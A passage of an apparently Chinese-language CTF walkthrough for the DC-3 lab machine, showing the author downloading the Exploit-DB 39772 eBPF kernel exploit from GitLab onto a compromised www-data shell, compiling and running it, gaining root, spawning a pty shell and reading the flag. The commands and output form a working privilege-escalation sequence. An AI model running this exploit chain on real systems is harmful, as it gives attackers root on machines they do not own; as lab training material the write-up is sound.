Proof of Concept: https://bugs.chromium.org/p/project-zero/issues/attachment?aid=232552
# 这里是下载链接,转到目标机器上下载
Exploit-DB Mirror: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39772.zip
www-data@DC-3:/var/www/html/templates/beez3/html$ wget https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39772.zip
<it-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39772.zip
--2024-01-10 14:57:51-- https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39772.zip
Resolving gitlab.com (gitlab.com)... 172.65.251.78, 2606:4700:90:0:f22e:fbec:5bed:a9b9
Connecting to gitlab.com (gitlab.com)|172.65.251.78|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 7025 (6.9K) [application/octet-stream]
Saving to: '39772.zip'
0K ...... 100% 11.2K=0.6s
2024-01-10 14:57:53 (11.2 KB/s) - '39772.zip' saved [7025/7025]
解压
www-data@DC-3:/var/www/html/templates/beez3/html$ unzip 39772.zip
unzip 39772.zip
Archive: 39772.zip
creating: 39772/
inflating: 39772/.DS_Store
creating: __MACOSX/
creating: __MACOSX/39772/
inflating: __MACOSX/39772/._.DS_Store
inflating: 39772/crasher.tar
inflating: __MACOSX/39772/._crasher.tar
inflating: 39772/exploit.tar
inflating: __MACOSX/39772/._exploit.tar
www-data@DC-3:/var/www/html/templates/beez3/html$ cd 39772
cd 39772
www-data@DC-3:/var/www/html/templates/beez3/html/39772$ tar -xvf exploit.tar
tar -xvf exploit.tar
ebpf_mapfd_doubleput_exploit/
ebpf_mapfd_doubleput_exploit/hello.c
ebpf_mapfd_doubleput_exploit/suidhelper.c
ebpf_mapfd_doubleput_exploit/compile.sh
ebpf_mapfd_doubleput_exploit/doubleput.c
按照文件里教程操作
www-data@DC-3:/var/www/html/templates/beez3/html/39772$ cd ebpf_mapfd_doubleput_exploit
</templates/beez3/html/39772$ cd ebpf_mapfd_doubleput_exploit
<tes/beez3/html/39772/ebpf_mapfd_doubleput_exploit$ ls
ls
compile.sh
doubleput.c
hello.c
suidhelper.c
<tes/beez3/html/39772/ebpf_mapfd_doubleput_exploit$ ./compile.sh
./compile.sh
doubleput.c: In function 'make_setuid':
doubleput.c:91:13: warning: cast from pointer to integer of different size [-Wpointer-to-int-cast]
.insns = (__aligned_u64) insns,
^
doubleput.c:92:15: warning: cast from pointer to integer of different size [-Wpointer-to-int-cast]
.license = (__aligned_u64)""
^
<tes/beez3/html/39772/ebpf_mapfd_doubleput_exploit$ ./doubleput
./doubleput
starting writev
woohoo, got pointer reuse
writev returned successfully. if this worked, you'll have a root shell in <=60 seconds.
suid file detected, launching rootshell...
we have root privs now...
id
uid=0(root) gid=0(root) groups=0(root),33(www-data)
用着有点难受,用python搞个交互式
python -c 'import pty; pty.spawn("/bin/bash")'
<tes/beez3/html/39772/ebpf_mapfd_doubleput_exploit# id
id
uid=0(root) gid=0(root) groups=0(root),33(www-data)
<tes/beez3/html/39772/ebpf_mapfd_doubleput_exploit# cd /root
cd /root
root@DC-3:/root# ls
ls
the-flag.txt
root@DC-3:/root# cat the-flag.txt
cat the-flag.txt
__ __ _ _ ____ _ _ _ _
\ \ / /__| | | | _ \ ___ _ __ ___| | | | |
\ \ /\ / / _ \ | | | | | |/ _ \| '_ \ / _ \ | | | |
\ V V / __/ | | | |_| | (_) | | | | __/_|_|_|_|
\_/\_/ \___|_|_| |____/ \___/|_| |_|\___(_|_|_|_)
Congratulations are in order. :-)
I hope you've enjoyed this challenge as I enjoyed making it.
If there are any ways that I can improve these little challenges,
please let me know.
As per usual, comments and complaints can be sent via Twitter to @DCAU7
Have a great day!!!!
祝贺你们。
我希望你们喜欢这个挑战,就像我喜欢做它一样。
如果有什么方法可以让我更好地改善这些小挑战,
请让我知道。
与往常一样,可以通过Twitter向@DCAU7发送评论和投诉
祝您今天过得愉快!!!
扫一扫
227
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
